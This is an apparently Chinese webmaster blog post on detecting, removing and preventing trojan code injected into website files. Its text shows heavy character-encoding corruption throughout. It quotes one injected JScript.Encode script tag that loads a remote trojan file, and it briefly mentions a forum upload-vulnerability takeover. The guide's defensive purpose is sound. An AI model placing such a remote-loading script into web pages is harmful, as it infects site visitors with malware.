在網(wǎng)站優(yōu)化設(shè)計(jì)當(dāng)中���,檢測(cè)網(wǎng)頁(yè)木馬也是很重要的一項(xiàng)工作,目前流行的網(wǎng)站被黑���,是在相應(yīng)的asp,htm,js等文件中���,插入以js調(diào)用方式的�。本文主要介紹網(wǎng)頁(yè)掛馬的種類(lèi)���、如何檢測(cè)網(wǎng)頁(yè)是否被掛馬����、如何清除網(wǎng)頁(yè)木馬�����。如何防止網(wǎng)頁(yè)被掛馬���。
1:網(wǎng)頁(yè)掛馬的種類(lèi).
目前流行的網(wǎng)站被黑�,是在相應(yīng)的asp,htm,js等文件中��,插入以js調(diào)用方式的���。更詳細(xì)的資料��,請(qǐng)點(diǎn)擊查看掛馬代碼大全�。
盧松松以前做過(guò)的‘極品源碼下載站’就遇到過(guò)JS掛馬
<SCRIPT language="JScript.Encode" src=http://www./muma.txt></script>
‘校園鬧翻天論壇’就遇到用戶(hù)提權(quán)���,利用動(dòng)網(wǎng)程序漏洞(上傳附件漏洞)擁有網(wǎng)站管理員權(quán)限����。刪了論壇幾千條數(shù)據(jù),一千多位會(huì)員的ID
2:如何檢測(cè)網(wǎng)頁(yè)是否被掛馬。
(1):專(zhuān)業(yè)檢測(cè)工具�����,六款免費(fèi)網(wǎng)頁(yè)安全檢測(cè)工具橫向測(cè)評(píng)(華軍軟件園)點(diǎn)此進(jìn)入
(2):google檢測(cè)��,或者可以利用Google搜索你的網(wǎng)站����、博客進(jìn)行檢測(cè)。如果有網(wǎng)站有木馬則google會(huì)在搜索列表的下方提示該網(wǎng)站有不安全因素�。
(3):殺毒軟件檢測(cè),常用的殺毒軟件也可以檢測(cè)出來(lái)��。
(4):人工檢測(cè)��,打開(kāi)你的網(wǎng)站�、博客,點(diǎn)擊右鍵查看源文件���,根據(jù)網(wǎng)頁(yè)掛馬的種類(lèi)也可以查看是否中了木馬��。
(5):使用McAfee SiteAdvisor安全瀏覽網(wǎng)頁(yè)的插件�����。例:檢測(cè)盧松松博客是否安全可點(diǎn)此查看����。
3:如何清除網(wǎng)頁(yè)木馬��。
一旦中了網(wǎng)頁(yè)木馬�,就看那些文件是最近修改過(guò)的,主要查看這些新文件�����,(從FTP中可以查看文件最近修改時(shí)間���。)然后進(jìn)入源文件把相關(guān)的網(wǎng)頁(yè)掛馬種類(lèi)的可疑代碼刪除��。
如果你對(duì)你所使用的網(wǎng)站���、博客程序不熟悉����,建議刪除所有文件(數(shù)據(jù)庫(kù)���、圖片���、文檔、程序模板主題等文件夾可以保留)
4:如何防止網(wǎng)頁(yè)被掛馬�����。如果你的網(wǎng)站還沒(méi)有被掛馬��,請(qǐng)從預(yù)防開(kāi)始吧��。
(1):對(duì)網(wǎng)友開(kāi)放上傳附件功能的網(wǎng)站一定要進(jìn)行身份認(rèn)證��,并只允許信任的人使用上傳程序���。
(2):保證你所使用的程序及時(shí)的更新�����。
(3):不要在前臺(tái)網(wǎng)頁(yè)上加注后臺(tái)管理程序登陸頁(yè)面的鏈接�。
(4):要時(shí)常備份數(shù)據(jù)庫(kù)等重要文件�,但不要把備份數(shù)據(jù)庫(kù)放在程序默認(rèn)的備份目錄下。
(5):管理員的用戶(hù)名和密碼要有一定復(fù)雜性���,不能過(guò)于簡(jiǎn)單�。
(6):IIS中禁止寫(xiě)入和目錄禁止執(zhí)行的功能���,二項(xiàng)功能組合�����,可以有效的防止ASP木馬���。
(7):可以在服務(wù)器、虛擬主機(jī)控制面板��,設(shè)置執(zhí)行權(quán)限選項(xiàng)中�,直接將有上傳權(quán)限的目錄�����,取消ASP的運(yùn)行權(quán)限�。
(8):創(chuàng)建一個(gè)robots.txt上傳到網(wǎng)站根目錄����。Robots能夠有效的防范利用搜索引擎竊取信息的駭客。 點(diǎn)此查看robots.txt使用方法���。
